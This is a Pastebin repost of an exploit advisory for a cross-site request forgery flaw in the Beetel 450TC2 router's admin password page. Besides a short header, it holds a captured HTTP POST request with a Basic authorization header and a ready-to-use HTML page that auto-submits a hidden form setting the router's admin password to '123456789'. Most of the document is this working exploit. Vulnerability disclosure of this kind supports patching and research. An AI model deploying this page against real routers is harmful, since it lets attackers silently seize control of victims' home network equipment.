Advertisement
Mayk0

#; Beetel 450TC2 Router Admin Password CSRF Vulnerability

May 1st, 2014
330
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.81 KB | None | 0 0
  1. Full title Beetel 450TC2 Router Admin Password CSRF Vulnerability
  2. Date add 2014-05-01
  3. Category web applications
  4. Platform hardware
  5. Risk <font color="#A5DF00">Security Risk Low</font>
  6. ============================================
  7.  
  8. <!--
  9. # Exploit Title: Beetel 450TC2 Router Admin Password Cross Site Request
  10. Forgery Vulnerability
  11. # Date: 30/04/2014
  12. # Exploit Author: shyamkumar somana
  13. # Vendor Homepage: www.beetel.in
  14. # Version: 450TC2 - Firmware version : TX6-0Q-005_retail
  15. # Tested on: Windows 8
  16.  
  17. #Beetel 450TC2 Router is vulnerable for cross site request forgery
  18. vulnerability in change password page.
  19. #Affected Resource/Form : Forms/tools_admin_1
  20.  
  21.  
  22. ###################################################################################
  23.  
  24. Post Request:
  25.  
  26. POST /Forms/tools_admin_1 HTTP/1.1
  27. Host: 192.168.1.1
  28. User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:29.0) Gecko/20100101
  29. Firefox/29.0
  30. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  31. Accept-Language: en-US,en;q=0.5
  32. Accept-Encoding: gzip, deflate
  33. Referer: http://192.168.1.1/maintenance/tools_admin.htm
  34. Authorization: Basic YWRtaW46c3lhbXNvbWFuYQ==
  35. Connection: keep-alive
  36. Content-Type: application/x-www-form-urlencoded
  37. Content-Length: 60
  38.  
  39. uiViewTools_Password=NEW_PASSWORD&uiViewTools_PasswordConfirm=NEW_PASSWORD
  40.  
  41. ###################################################################################
  42.  
  43. #Exploit:
  44. -->
  45.  
  46. <html>
  47. <body>
  48. <form action="http://192.168.1.1/Forms/tools_admin_1" method="POST">
  49. <input type="hidden" name="uiViewTools_Password" value="123456789" />
  50. <input type="hidden" name="uiViewTools_PasswordConfirm" value="123456789" />
  51. <input type="submit" value="Submit form" />
  52. </form>
  53. <script>
  54. document.forms[0].submit();
  55. </script>
  56. </body>
  57. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement